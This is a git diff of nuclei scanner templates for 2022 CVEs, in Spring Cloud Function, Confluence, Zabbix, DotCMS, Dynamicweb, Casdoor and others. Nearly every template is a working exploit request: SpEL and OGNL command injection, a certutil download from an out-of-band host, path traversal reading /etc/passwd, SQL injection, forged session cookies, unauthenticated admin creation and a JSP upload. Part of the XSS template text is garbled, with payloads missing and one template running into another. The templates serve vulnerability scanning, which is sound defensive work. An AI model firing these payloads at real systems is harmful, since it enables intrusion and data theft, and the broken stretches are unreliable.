-id: CVE-2022-22963 - -info: - name: Spring Cloud Function SPEL RCE - author: Mr-xn,Adam Crosser - severity: critical - reference: - - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE - - https://tanzu.vmware.com/security/cve-2022-22963 - - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ - - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection - classification: - cve-id: CVE-2022-22963 - tags: cve,cve2022,springcloud,rce - -requests: - - raw: - - | - POST /functionRouter HTTP/1.1 - Host: {{Hostname}} - spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") - Content-Type: application/x-www-form-urlencoded - - {{rand_base(8)}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or - - - type: status - status: - - 500 diff --git a/nuclei-templates/CVE-2022/CVE-2022-22972.yaml b/nuclei-templates/CVE-2022/CVE-2022-22972.yaml deleted file mode 100644 index f0934ac0fe..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-22972.yaml +++ /dev/null @@ -1,93 +0,0 @@ -id: CVE-2022-22972 -info: - name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass - author: For3stCo1d,princechaddha - severity: critical - description: | - VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. - reference: - - https://github.com/horizon3ai/CVE-2022-22972 - - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive - - https://www.vmware.com/security/advisories/VMSA-2022-0014.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22972 - cwe-id: CWE-287 - metadata: - fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" - tags: cve,cve2022,vmware,auth-bypass,oast -requests: - - raw: - - | - GET /vcac/ HTTP/1.1 - Host: {{Hostname}} - - | - GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 - Host: {{Hostname}} - - | - POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 - Host: {{interactsh-url}} - Content-type: application/x-www-form-urlencoded - - protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in - redirects: true - max-redirects: 3 - cookie-reuse: true - extractors: - - type: regex - part: body - name: protected_state - group: 1 - regex: - - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' - internal: true - - type: regex - part: body - name: horizonRelayState - group: 1 - regex: - - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' - internal: true - - type: regex - part: body - name: userstore - group: 1 - regex: - - 'id="userstore" value="([a-z.]+)" \/>' - internal: true - - type: regex - part: body - name: userstoreDisplay - group: 1 - regex: - - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' - internal: true - - type: regex - part: body - name: stickyConnectorId - group: 1 - regex: - - 'name="stickyConnectorId" value="(.*)"/>' - internal: true - - type: kval - part: header - name: HZN-Cookie - kval: - - 'HZN' - matchers-condition: and - matchers: - - type: word - part: header - words: - - "HZN=" - - type: status - status: - - 302 - - type: word - part: interactsh_protocol - words: - - "http" - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23131.yaml b/nuclei-templates/CVE-2022/CVE-2022-23131.yaml new file mode 100644 index 0000000000..725c2396c4 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-23131.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-23131 + +info: + name: Zabbix - SAML SSO Authentication Bypass + author: For3stCo1d,spac3wh1te + severity: critical + description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified. + reference: + - https://support.zabbix.com/browse/ZBX-20350 + - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage + - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 + - https://github.com/1mxml/CVE-2022-23131 + remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-23131 + cwe-id: CWE-290 + cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* + epss-score: 0.9718 + metadata: + max-request: 2 + fofa-query: app="ZABBIX-监控系统" && body="saml" + shodan-query: http.favicon.hash:892542951 + tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev + +http: + - method: GET + path: + - "{{BaseURL}}/zabbix/index_sso.php" + - "{{BaseURL}}/index_sso.php" + + headers: + Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 302 + + - type: dsl + dsl: + - "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')" + +# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23134.yaml b/nuclei-templates/CVE-2022/CVE-2022-23134.yaml deleted file mode 100644 index 06a3f5acb1..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23134.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-23134 - -info: - name: Zabbix Setup Configuration Authentication Bypass - author: bananabr - severity: medium - description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. - reference: - - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - - https://nvd.nist.gov/vuln/detail/CVE-2022-23134 - - https://support.zabbix.com/browse/ZBX-20384 - - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N - cvss-score: 5.3 - cve-id: CVE-2022-23134 - epss-score: 0.33652 - tags: cve,cve2022,zabbix,auth-bypass,kev - metadata: - max-request: 2 - -http: - - method: GET - path: - - "{{BaseURL}}/zabbix/setup.php" - - "{{BaseURL}}/setup.php" - - headers: - Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Database" - - "host" - - "port" - - "Zabbix" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23347.yaml b/nuclei-templates/CVE-2022/CVE-2022-23347.yaml new file mode 100644 index 0000000000..39814e8c68 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-23347.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-23347 + +info: + name: BigAnt Server v5.6.06 - Local File Inclusion + author: 0x_Akoko + severity: high + description: BigAnt Server v5.6.06 is vulnerable to local file inclusion. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server. + remediation: | + Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in BigAnt Server v5.6.06. + reference: + - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23347 + - http://bigant.com + - https://www.bigantsoft.com/ + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-23347 + cwe-id: CWE-22 + epss-score: 0.1468 + epss-percentile: 0.95635 + cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: bigantsoft + product: bigant_server + shodan-query: http.html:"BigAnt" + tags: cve,cve2022,bigant,lfi,bigantsoft + +http: + - method: GET + path: + - "{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: status + status: + - 200 +# digest: 490a0046304402201d2b033a4d065dc457c2bd88fd09609a69b0f0999e1d44242fc8387d1c118276022052c1fd2978c3590d540c66759ce5c8203011da6e4d81139306e90fc70958a40e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23881.yaml b/nuclei-templates/CVE-2022/CVE-2022-23881.yaml deleted file mode 100644 index a61fef96bc..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23881.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2022-23881 - -info: - name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution - author: pikpikcu - severity: critical - description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. - reference: - - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md - - http://www.zzzcms.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-23881 - cwe-id: CWE-77 - cpe: cpe:2.3:a:zzzcms:zzzphp:*:*:*:*:*:*:*:* - epss-score: 0.31115 - tags: cve,cve2022,rce,zzzphp,zzzcms - metadata: - max-request: 1 - -http: - - raw: - - | - GET /?location=search HTTP/1.1 - Host: {{Hostname}} - Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: status - status: - - 500 - -# Enhanced by mp on 2022/04/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24124.yaml b/nuclei-templates/CVE-2022/CVE-2022-24124.yaml deleted file mode 100644 index 7332389579..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24124.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2022-24124 - -info: - name: Casdoor 1.13.0 - Unauthenticated SQL Injection - author: cckuailong - severity: high - description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations. - remediation: | - Upgrade to a patched version of Casdoor or apply the necessary security patches to mitigate the SQL injection vulnerability. - reference: - - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html - - https://www.exploit-db.com/exploits/50792 - - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget - - https://nvd.nist.gov/vuln/detail/CVE-2022-24124 - - https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-24124 - cwe-id: CWE-89 - epss-score: 0.01169 - epss-percentile: 0.83361 - cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: casbin - product: "casdoor" - shodan-query: http.title:"Casdoor" - tags: sqli,unauth,packetstorm,edb,cve,cve2022,casdoor - -http: - - method: GET - path: - - "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "XPATH syntax error.*'" - - "casdoor" - condition: and - - - type: status - status: - - 200 - -# digest: 4b0a004830460221009077f8a941a481bfbd2f44f390f850b6fb6d708592c4450115e4f403ba538b30022100ba34984a46092e3f90f87d42784b0772608f993a55a0e561391b7440fe5a6188:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24181.yaml b/nuclei-templates/CVE-2022/CVE-2022-24181.yaml new file mode 100644 index 0000000000..706599f0a0 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-24181.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-24181 +info: + name: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) + author: lucasljm2001,ekrause + severity: medium + description: | + Detects an XSS vulnerability in Open Journals System. + reference: + - https://www.exploit-db.com/exploits/50881 + - https://github.com/pkp/pkp-lib/issues/7649 + - https://youtu.be/v8-9evO2oVg + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181 + - https://nvd.nist.gov/vuln/detail/cve-2022-24181 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-24181 + metadata: + verified: true + tags: cve,cve2022,xss,oss,pkp-lib +requests: + - raw: + - | + GET /iupjournals/index.php/esj HTTP/2 + Host: {{Hostname}} + X-Forwarded-Host: foo">alert(document.domain)' + - '"Not authenticated"' + condition: and + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2022/CVE-2022-24900.yaml b/nuclei-templates/CVE-2022/CVE-2022-24900.yaml deleted file mode 100644 index 9f2945210d..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24900.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2022-24900 -info: - name: Piano LED Visualizer 1.3 - Local File Inclusion - author: 0x_Akoko - severity: high - description: | - Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion. - reference: - - https://github.com/onlaj/Piano-LED-Visualizer/issues/350 - - https://vuldb.com/?id.198714 - - https://www.cvedetails.com/cve/CVE-2022-24900/ - - https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cve-id: CVE-2022-24900 - cwe-id: CWE-610 - tags: cve,cve2022,lfi,piano,iot,oss -requests: - - method: GET - path: - - "{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24990.yaml b/nuclei-templates/CVE-2022/CVE-2022-24990.yaml deleted file mode 100644 index 406f650c14..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24990.yaml +++ /dev/null @@ -1,59 +0,0 @@ -id: CVE-2022-24990 - -info: - name: TerraMaster TOS < 4.2.30 Server Information Disclosure - author: dwisiswant0 - severity: high - description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure. - remediation: | - Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability. - reference: - - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ - - https://www.broadcom.com/support/security-center/attacksignatures/detail?asid=33732 - - https://forum.terra-master.com/en/viewforum.php?f=28 - - http://packetstormsecurity.com/files/172904/TerraMaster-TOS-4.2.29-Remote-Code-Execution.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-24990 - cwe-id: CWE-306 - epss-score: 0.93762 - epss-percentile: 0.98891 - cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: terra-master - product: terramaster_operating_system - shodan-query: "TerraMaster" - tags: packetstorm,cve,cve2022,terramaster,exposure,kev - -http: - - method: GET - path: - - "{{BaseURL}}/module/api.php?mobile/webNasIPS" - - headers: - User-Agent: "TNAS" - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "application/json" - - "TerraMaster" - condition: and - - - type: regex - part: body - regex: - - "webNasIPS successful" - - "(ADDR|(IFC|PWD|[DS]AT)):" - - "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" - condition: or - - - type: status - status: - - 200 - -# digest: 490a00463044021f6e66448fd76e8c8c0990a581377289c1d141b0e49707e049e1dd3b470a9dcb022100ed94be8f7cd3c2849ec172f238359e54d558e772f488741c149d14999d5541f1:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2022/CVE-2022-25323.yaml b/nuclei-templates/CVE-2022/CVE-2022-25323.yaml deleted file mode 100644 index 76d9d8c766..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-25323.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2022-25323 - -info: - name: ZEROF Web Server 2.0 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0. - reference: - - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 - - https://awillix.ru - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-25323 - cwe-id: CWE-79 - epss-score: 0.00115 - epss-percentile: 0.45065 - cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: zerof - product: web_server - tags: xss,cve,cve2022,zerof - -http: - - method: GET - path: - - "{{BaseURL}}/admin.back" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'back' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 401 - -# digest: 4b0a00483046022100967fa23ea09cb3af69df617c5468652e0e4dfd64cd1fa00cfaff586fee5794e5022100d790d0b0674fc912cf185e0683e39cd37a065f890e11c62e5194847b31f54f49:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2022/CVE-2022-25369.yaml b/nuclei-templates/CVE-2022/CVE-2022-25369.yaml new file mode 100644 index 0000000000..38ab8f6953 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-25369.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-25369 + +info: + name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation + author: pdteam + severity: critical + description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user. + remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.' + reference: + - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-25369 + cwe-id: CWE-425 + metadata: + max-request: 1 + shodan-query: http.component:"Dynamicweb" + tags: cve2022,cve,dynamicweb,rce,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Success": true' + - '"Success":true' + condition: or + + - type: word + part: header + words: + - 'application/json' + - 'ASP.NET_SessionId' + condition: and + case-insensitive: true + + - type: status + status: + - 200 +# digest: 4a0a00473045022100b7f35452dbfcd48834f3400c73dcf201cc3872265ccf60c523480c1d6cee56fd02202c82c05a62a41f20bff8ca897e0fbf249b14b87a0da1aa8d03aebb40c626803d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-26134.yaml b/nuclei-templates/CVE-2022/CVE-2022-26134.yaml deleted file mode 100644 index 0f5e4c501b..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-26134.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2022-26134 -info: - name: Confluence - Remote Code Execution - author: pdteam,jbertman - severity: critical - description: | - Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability. - reference: - - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis - - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html - - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ - - https://jira.atlassian.com/browse/CONFSERVER-79016 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-26134 - cwe-id: CWE-74 - metadata: - shodan-query: http.component:"Atlassian Confluence" - verified: "true" - tags: cve,cve2022,confluence,rce,ognl,oast,kev -requests: - - method: GET - path: - - "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/" - - "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/" - stop-at-first-match: true - req-condition: true - matchers-condition: or - matchers: - - type: dsl - dsl: - - 'contains(to_lower(all_headers_1), "x-cmd-response:")' - - type: dsl - dsl: - - 'contains(interactsh_protocol, "dns")' - - 'contains(to_lower(response_2), "confluence")' - condition: and - extractors: - - type: kval - part: header - kval: - - "x_cmd_response" - -# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26148.yaml b/nuclei-templates/CVE-2022/CVE-2022-26148.yaml new file mode 100644 index 0000000000..1ff8a7785d --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-26148.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-26148 + +info: + name: Grafana & Zabbix Integration - Credentials Disclosure + author: Geekby + severity: critical + description: | + Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. + reference: + - https://2k8.org/post-319.html + - https://security.netapp.com/advisory/ntap-20220425-0005/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-26148 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-26148 + epss-score: 0.15557 + metadata: + max-request: 1 + fofa-query: app="Grafana" + shodan-query: title:"Grafana" + tags: cve,cve2022,grafana,zabbix,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - '"password":"(.*?)"' + - '"username":"(.*?)"' + condition: and + + - type: word + part: body + words: + - '"zabbix":' + - '"zbx":' + - "alexanderzobnin-zabbix-datasource" + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - '"password":"(.*?)"' + - '"username":"(.*?)"' + - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' + +# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26159.yaml b/nuclei-templates/CVE-2022/CVE-2022-26159.yaml deleted file mode 100644 index 08705eb77a..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-26159.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2022-26159 - -info: - name: Ametys CMS Information Disclosure - author: Remi Gascou (podalirius) - severity: medium - description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 - - https://podalirius.net/en/cves/2022-26159/ - - https://issues.ametys.org/browse/CMS-10973 - - https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-26159 - cwe-id: CWE-425 - epss-score: 0.00597 - epss-percentile: 0.75972 - cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: ametys - product: ametys - tags: cve,cve2022,plugin,ametys,cms - -http: - - method: GET - path: - - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' - - matchers-condition: and - matchers: - - type: word - words: - - '' - - '' - condition: and - - - type: word - part: header - words: - - 'text/xml' - - - type: status - status: - - 200 - -# digest: 4a0a0047304502203ae18ae0788ec7bba9ff7655f021e591d4738f30ebc268792ba8cad5511b62fc022100fb29e7d8ae023df0fdf98dd1918e899657007c99aa84a9ce14c6ac2d5f93e00b:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26352.yaml b/nuclei-templates/CVE-2022/CVE-2022-26352.yaml new file mode 100644 index 0000000000..f75c2c3155 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-26352.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-26352 +info: + name: DotCMS - Arbitrary File Upload + author: h1ei1 + severity: critical + description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. + reference: + - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/ + - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352 + - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html + classification: + cve-id: CVE-2022-26352 + tags: cve,cve2022,rce,dotcms +requests: + - raw: + - | + POST /api/content/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3 + + --------------------------aadc326f7ae3eac3 + Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp" + Content-Type: text/plain + + <% + out.println("CVE-2022-26352"); + %> + --------------------------aadc326f7ae3eac3-- + - | + GET /{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "CVE-2022-26352")' + - 'status_code_2 == 200' + condition: and + +# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26564.yaml b/nuclei-templates/CVE-2022/CVE-2022-26564.yaml new file mode 100644 index 0000000000..f95d08a217 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-26564.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-26564 +info: + name: HotelDruid Hotel Management Software 3.0.3 XSS + author: alexrydzak + severity: medium + description: | + HotelDruid Hotel Management Software v3.0.3 contains a cross-site scripting (XSS) vulnerability. + reference: + - https://rydzak.me/2022/04/cve-2022-26564/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-26564 + - https://www.hoteldruid.com + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-26564 + cwe-id: CWE-79 + metadata: + shodan-query: http.favicon.hash:-1521640213 + tags: cve,cve2022,hoteldruid,xss +requests: + - method: GET + path: + - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22>' + - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22>&idclienti=1' + - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22>' + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "HotelDruid" + condition: and + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-27927.yaml b/nuclei-templates/CVE-2022/CVE-2022-27927.yaml deleted file mode 100644 index 96820d1ca3..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-27927.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-27927 -info: - name: Microfinance Management System 1.0 - SQL Injection - author: lucasljm2001,ekrause - severity: critical - description: | - Microfinance Management System 1.0 is susceptible to SQL Injection. - reference: - - 